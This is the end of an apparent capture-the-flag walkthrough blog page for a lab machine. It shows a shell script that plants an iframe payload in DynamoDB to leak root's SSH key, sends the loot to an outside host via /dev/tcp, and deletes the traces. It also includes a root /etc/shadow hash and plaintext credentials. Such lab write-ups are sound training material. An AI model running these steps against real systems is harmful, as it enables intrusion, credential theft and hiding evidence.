SemanticString__Fragment--Code">alerts</code></span><span class="SemanticString"> table with:</span></span><div id="https://www.notion.so/9f9467419b724425abdd1485e83061a1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws dynamodb create-table \
--table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 \
--endpoint-url http://localhost:4566</code></span></span></p></div></li><li id="https://www.notion.so/32147f87e4344617a00a65663b83d89d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Create a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Ransomware</code></span><span class="SemanticString"> item that embeds the root's SSH key in an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">iframe</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/5c9a878f9a9940ab9c3f8232473bc800" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws dynamodb put-item \
--table-name alerts \
--item '{"title":{"S":"Ransomware"}, "data":{"S":"<html><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}}' \
--return-consumed-capacity TOTAL \
--endpoint-url http://localhost:4566</code></span></span></p></div></li><li id="https://www.notion.so/24dde59c810f4dcb8a8382cfbd659f22" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make a POST request to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">bucket-app</code></span><span class="SemanticString"> on port 8000 to execute the PHP code:</span></span><div id="https://www.notion.so/81ffe7626f184198bddfbcbed95741bd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl -XPOST --data "action=get_alerts" http://localhost:8000</code></span></span></p></div></li><li id="https://www.notion.so/4f81598e427742b5b04c170d4f3bfbbe" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Remember, the database resets frequently at around once every minute, so we have to be fast. Let's combine them into an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws_exploit.sh</code></span><span class="SemanticString"> script:</span></span><pre id="https://www.notion.so/0e836f0b36a649939f14062c2d4963a4" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token comment"># Create alerts table</span>
aws dynamodb create-table <span class="token punctuation">\</span>
--table-name alerts <span class="token punctuation">\</span>
--attribute-definitions <span class="token assign-left variable">AttributeName</span><span class="token operator">=</span>title,AttributeType<span class="token operator">=</span>S <span class="token assign-left variable">AttributeName</span><span class="token operator">=</span>data,AttributeType<span class="token operator">=</span>S <span class="token punctuation">\</span>
--key-schema <span class="token assign-left variable">AttributeName</span><span class="token operator">=</span>title,KeyType<span class="token operator">=</span>HASH <span class="token assign-left variable">AttributeName</span><span class="token operator">=</span>data,KeyType<span class="token operator">=</span>RANGE <span class="token punctuation">\</span>
--provisioned-throughput <span class="token assign-left variable">ReadCapacityUnits</span><span class="token operator">=</span><span class="token number">10</span>,WriteCapacityUnits<span class="token operator">=</span><span class="token number">5</span> <span class="token punctuation">\</span>
--endpoint-url http://localhost:4566
<span class="token comment"># Create Ransomware item with payload</span>
aws dynamodb put-item <span class="token punctuation">\</span>
--table-name alerts <span class="token punctuation">\</span>
<span class="token parameter variable">--item</span> <span class="token string">'{
"title": {"S": "Ransomware"},
"data": {"S": "<html><body><iframe src='</span>/root/.ssh/id_rsa<span class="token string">'></iframe></body></html>"}
}'</span> <span class="token punctuation">\</span>
--return-consumed-capacity TOTAL <span class="token punctuation">\</span>
--endpoint-url http://localhost:4566
<span class="token comment"># Make curl request</span>
<span class="token function">curl</span> <span class="token parameter variable">-XPOST</span> <span class="token parameter variable">--data</span> <span class="token string">"action=get_alerts"</span> http://localhost:8000
<span class="token comment"># Deliver the loot and hide our tracks</span>
<span class="token function">tar</span> <span class="token parameter variable">-czvf</span> /tmp/.samiko/loot.tar.gz /var/www/bucket-app/files/
<span class="token function">cat</span> /tmp/.samiko/loot.tar.gz <span class="token operator">></span> /dev/tcp/10.10.14.103/6969
<span class="token function">rm</span> /tmp/.samiko/loot.tar.gz</span></span></span></code></pre></li><li id="https://www.notion.so/9e284641161a4c6c98a0b67d8bc5c268" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Start a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nc</code></span><span class="SemanticString"> listner on our target machine:</span></span><div id="https://www.notion.so/1cd4a6afd24740eca7f8c8991ea3a9b8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4204 > aws_exploit.sh</code></span></span></p></div></li><li id="https://www.notion.so/c71ee1e8c4924d15808fd1937ed20d5c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Send the script:</span></span><div id="https://www.notion.so/4d641d10eb134d8d893bd9782adf5e60" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat aws_exploit.sh > /dev/tcp/10.10.10.212/4204</code></span></span></p></div></li><li id="https://www.notion.so/9b7577cac138410db80392e25e1f6dc9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make the script executionable:</span></span><div id="https://www.notion.so/81e3cc28d05d4eeb90509e0a9844bb0b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chmod +x ./aws_exploit.sh</code></span></span></p></div></li><li id="https://www.notion.so/f3056719ac094aabad3286c3ae494edd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Start a listener on our local machine:</span></span><div id="https://www.notion.so/59664c587a1f4d05ac11827c4825367e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969</code></span></span></p></div></li><li id="https://www.notion.so/10473987b23a429c9821e2aa7d9d2228" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Run the script on the target:</span></span><div id="https://www.notion.so/d85726add4474f67834cfe2c8e322fcb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./aws_exploit.sh</code></span></span></p></div><pre id="https://www.notion.so/e6ce81b8628745c4a0dfbbbac5b76820" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>TABLEDESCRIPTION 1612282007.46 0 arn:aws:dynamodb:us-east-1:000000000000:table/alerts alerts 0 ACTIVE
ATTRIBUTEDEFINITIONS title S
ATTRIBUTEDEFINITIONS data S
KEYSCHEMA title HASH
KEYSCHEMA data RANGE
PROVISIONEDTHROUGHPUT 0.0 0.0 0 10 5
CONSUMEDCAPACITY 1.0 alerts
tar: Removing leading `/' from member names
/var/www/bucket-app/files/
/var/www/bucket-app/files/3693.html
/var/www/bucket-app/files/result.pdf</span></span></span></code></pre></li><li id="https://www.notion.so/9abc247486c3453098b91be1f5deca1f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After executing the script, we should receive the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.tar.gz</code></span><span class="SemanticString"> archive of the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/var/www/bucket-app/files/</code></span><span class="SemanticString"> directory, containing the root SSH key in a PDF file:</span></span><div id="https://www.notion.so/36599e09b93649cc84dcaa520f441b01" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir loot && tar -xzvf ./loot.tar.gz -C ./loot</code></span></span></p></div><div id="https://www.notion.so/2001eb1669904337935544441d851dbf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la ./loot/var/www/bucket-app/files/</code></span></span></p></div><pre id="https://www.notion.so/a0736d3702744a998755f90e08cf8e24" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>total 16
drwxr-x--- 2 samiko users 4096 Feb 3 02:37 .
drwxr-xr-x 3 samiko users 4096 Feb 3 02:40 ..
-rw-r--r-- 1 samiko users 65 Feb 3 02:37 7499.html
-rw-r--r-- 1 samiko users 3869 Feb 3 02:37 result.pdf</span></span></span></code></pre></li><li id="https://www.notion.so/2e1385d8f832437f9a3d8000385d839e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Copy the contents of the PDF to a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root_id_rsa</code></span><span class="SemanticString"> file:</span></span><div id="https://www.notion.so/d7f4ef71865643489cb33cfc60c071a5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chromium ./var/www/bucket-app/files/result.pdf</code></span></span></p></div><div id="https://www.notion.so/24158dee437f42a69fe4e6cb9dd2e04b" class="Image Image--PageWidth"><figure><a href="https://i.imgur.com/K2LAPJP.png"><img src="https://i.imgur.com/K2LAPJP.png" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></li><li id="https://www.notion.so/3ac19510d6db45f98fa3839bc446a26f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After setting the appropriate permissions, use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root_id_rsa</code></span><span class="SemanticString"> to SSH in as root:</span></span><div id="https://www.notion.so/c8d99cd6dce24a4babf77021b563f9d3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chmod 700 root_id_rsa</code></span></span></p></div><div id="https://www.notion.so/6bc7e79e3fcd4eb7abed07193409beff" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh -i root_id_rsa root@10.10.10.212</code></span></span></p></div><div id="https://www.notion.so/7000305e5aeb4325946b2e7675ddea89" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/cf217ac848294fbba6d2cd5fa8b337e0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root
uid=0(root) gid=0(root) groups=0(root)</span></span></span></code></pre></li><li id="https://www.notion.so/2614a99376a34c28a77fe21a987dacaa" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/16c6a65c37ad41bd95abe1d54808b54d" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/16c6a65c37ad41bd95abe1d54808b54d"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Post-exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/abd2f64197f64e8cbabccfc76286ff67" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">In the root home directory, we find the scripts used for the scheduled AWS resets:</span></span><div id="https://www.notion.so/e91afdbb38cf42eaa6306d2c136a862c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat start.sh</code></span></span></p></div><pre id="https://www.notion.so/6b3f483f706f413e8a33f9feee47dbf3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token builtin class-name">cd</span> /root <span class="token operator">&&</span> <span class="token function">docker-compose</span> up <span class="token parameter variable">-d</span>
<span class="token function">sleep</span> <span class="token number">20</span>
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 mb s3://adserver
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">sync</span> /root/backups s3://adserver
<span class="token function">sleep</span> <span class="token number">20</span>
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 mb s3://adserver
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">sync</span> /root/backups s3://adserver</span></span></span></code></pre><div id="https://www.notion.so/2f8ff46cdd944da38acf87a89f15f17b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat sync.sh</code></span></span></p></div><pre id="https://www.notion.so/004303da9a0945458caa6ff0fde3c963" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> /root/files/*
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">sync</span> s3://adserver/ /root/files/ <span class="token parameter variable">--exclude</span> <span class="token string">"*.png"</span> <span class="token parameter variable">--exclude</span> <span class="token string">"*.jpg"</span>
<span class="token function">cp</span> <span class="token parameter variable">-R</span> /root/files/* /var/www/html/</span></span></span></code></pre><div id="https://www.notion.so/1f41b255e7ee47beaa60cb7f42470576" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat restore.sh</code></span></span></p></div><pre id="https://www.notion.so/00cb88c332db4100a12b363a4e3d893a" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token function">sleep</span> <span class="token number">60</span>
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">rm</span> s3://adserver <span class="token parameter variable">--recursive</span>
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 rb s3://adserver
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 mb s3://adserver
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">sync</span> /root/backups/ s3://adserver
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> /var/www/html/*
<span class="token function">cp</span> <span class="token parameter variable">-R</span> /root/backups/index.html /var/www/html/
/root/restore.php</span></span></span></code></pre><div id="https://www.notion.so/4fa9efa4034843379151601b81ab2811" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat restore.php</code></span></span></p></div><pre id="https://www.notion.so/1c0fb69d485f413185a39b4cfe8674fd" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>#!/usr/bin/php
<span class="token php language-php"><span class="token delimiter important"><?php</span>
<span class="token keyword">require</span> <span class="token string single-quoted-string">'/var/www/bucket-app/vendor/autoload.php'</span><span class="token punctuation">;</span>
<span class="token function">date_default_timezone_set</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'America/New_York'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">use</span> <span class="token package">Aws<span class="token punctuation">\</span>DynamoDb<span class="token punctuation">\</span>DynamoDbClient</span><span class="token punctuation">;</span>
<span class="token keyword">use</span> <span class="token package">Aws<span class="token punctuation">\</span>DynamoDb<span class="token punctuation">\</span>Exception<span class="token punctuation">\</span>DynamoDbException</span><span class="token punctuation">;</span>
<span class="token variable">$client</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name class-name-fully-qualified">Aws<span class="token punctuation">\</span>Sdk</span><span class="token punctuation">(</span><span class="token punctuation">[</span>
<span class="token string single-quoted-string">'profile'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'default'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'region'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'us-east-1'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'version'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'latest'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'endpoint'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'http://localhost:4566'</span>
<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$dynamodb</span> <span class="token operator">=</span> <span class="token variable">$client</span><span class="token operator">-></span><span class="token function">createDynamoDb</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$params</span> <span class="token operator">=</span> <span class="token punctuation">[</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'alerts'</span>
<span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$tableName</span><span class="token operator">=</span><span class="token string single-quoted-string">'users'</span><span class="token punctuation">;</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token variable">$response</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">createTable</span><span class="token punctuation">(</span><span class="token punctuation">[</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token variable">$tableName</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'AttributeDefinitions'</span> <span class="token operator">=></span> <span class="token punctuation">[</span>
<span class="token punctuation">[</span>
<span class="token string single-quoted-string">'AttributeName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'username'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'AttributeType'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'S'</span>
<span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token punctuation">[</span>
<span class="token string single-quoted-string">'AttributeName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'password'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'AttributeType'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'S'</span>
<span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'KeySchema'</span> <span class="token operator">=></span> <span class="token punctuation">[</span>
<span class="token punctuation">[</span>
<span class="token string single-quoted-string">'AttributeName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'username'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'KeyType'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'HASH'</span>
<span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token punctuation">[</span>
<span class="token string single-quoted-string">'AttributeName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'password'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'KeyType'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'RANGE'</span>
<span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'ProvisionedThroughput'</span> <span class="token operator">=></span> <span class="token punctuation">[</span>
<span class="token string single-quoted-string">'ReadCapacityUnits'</span> <span class="token operator">=></span> <span class="token number">5</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'WriteCapacityUnits'</span> <span class="token operator">=></span> <span class="token number">5</span>
<span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$response</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">putItem</span><span class="token punctuation">(</span><span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token variable">$tableName</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'Item'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'username'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Cloudadm'</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'password'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Welcome123!'</span><span class="token punctuation">)</span>
<span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$response</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">putItem</span><span class="token punctuation">(</span><span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token variable">$tableName</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'Item'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'username'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Mgmt'</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'password'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Management@#1@#'</span><span class="token punctuation">)</span>
<span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$response</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">putItem</span><span class="token punctuation">(</span><span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token variable">$tableName</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'Item'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'username'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Sysadm'</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'password'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'n2vM-<_K_Q:.Aa2'</span><span class="token punctuation">)</span>
<span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span>
<span class="token keyword">catch</span><span class="token punctuation">(</span><span class="token class-name">Exception</span> <span class="token variable">$e</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">echo</span> <span class="token string single-quoted-string">'Message: '</span> <span class="token operator">.</span><span class="token variable">$e</span><span class="token operator">-></span><span class="token function">getMessage</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token variable">$result</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">deleteTable</span><span class="token punctuation">(</span><span class="token variable">$params</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></span></code></pre></li></ul><h2 id="https://www.notion.so/a91688bb194d4adb9eeff945f5df02a7" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/a91688bb194d4adb9eeff945f5df02a7"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/a862c564962143b6918cdceb606a52aa" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root user's hash from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/shadow</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/a70321b0846046fda8a462e727eab78b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root:$6$rvx83lCm9lfbxx/M$x56XT96DB4RIHKtx8HhObNwNNe1TBEAUZlkhhgE2Goqg.ZnbIn/VOD.T2Q0XhcTxmLmAMrjk5ad6Gsd/jgjQn/:18528:0:99999:7:::</span></span></span></code></pre></li><li id="https://www.notion.so/b3a16e847bd8498593cd5d7bde9bc1a8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Clean up after ourselves and delete any residual files:</span></span><div id="https://www.notion.so/b343a6c87a4d416eaa4b95496809ae62" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ rm -r /tmp/.samiko/</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/c75de2b1d869487f8ea9e4b9da717898" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/c75de2b1d869487f8ea9e4b9da717898"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/3715ab55d37a428f8e65b191d7dc44f3" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://docs.aws.amazon.com/cli/latest/userguide/cli-services-dynamodb.html">https://docs.aws.amazon.com/cli/latest/userguide/cli-services-dynamodb.html</a></span></span></li></ol></article>
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>